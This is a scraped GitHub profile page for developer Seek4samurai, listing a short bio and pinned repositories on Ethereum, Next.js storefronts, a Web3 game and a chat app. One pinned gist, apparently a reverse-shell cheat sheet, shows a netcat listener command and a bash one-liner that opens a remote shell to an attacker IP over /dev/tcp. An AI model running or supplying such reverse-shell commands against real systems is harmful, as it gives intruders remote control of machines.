Skip to content
View Seek4samurai's full-sized avatar
๐ŸŒ
Working remotely...
๐ŸŒ
Working remotely...

Organizations

@Design-and-Code
Block or Report

Block or report Seek4samurai

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this userโ€™s behavior. Learn more about reporting abuse.

Report abuse
Seek4samurai/README.md

Hi ๐Ÿ‘‹, I'm Gourav

Have an idea? Drop me a Mail or DM.

I like to work on Ethereum blockchain, Crypto, Web application, Security Ops, Cloud/Serverless applications, & Integrations.

seek4samurai

Pinned

  1. ethereum-org-website ethereum-org-website Public

    Forked from ethereum/ethereum-org-website

    Ethereum.org is a primary online resource for the Ethereum community.

    Markdown 1

  2. Medusa-NextJs-StoreFront Medusa-NextJs-StoreFront Public

    Medusa + Next.js starter frontend UI project as a part of Open source contribution. A beautiful Next.js based storefront for @medusajs

    JavaScript 23 6

  3. project-giga-cat project-giga-cat Public

    Nyan cat game with MetaMask authentication for Web 3.0 ecosystem. Made out of Next.js & Moralis. Database powered by @redis (Currently in hibernation)

    JavaScript 7

  4. noir noir Public

    NextJs application for real time messaging. Built in NextJs, firebase, Mui and styled-components. Take a glance over the amazing UI of this application.

    JavaScript 4

  5. nmap-descTags nmap-descTags
    1
    Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.
    2
    
                  
    3
    Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, 
    4
    what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
    5
    
                  
  6. code-execution-reverse-shell-command... code-execution-reverse-shell-commands.txt
    1
    The following examples assums the hacker IP is 10.20.14 and use port 8080 for the connection.
    2
    Therefore in all f these cases you need to listen for port 8080 using the foolowing command `nc -vv -l -p 8080`
    3
    
                  
    4
    BASH
    5
    bash -i >& /dev/tcp/10.20.14.203/8080 0>&1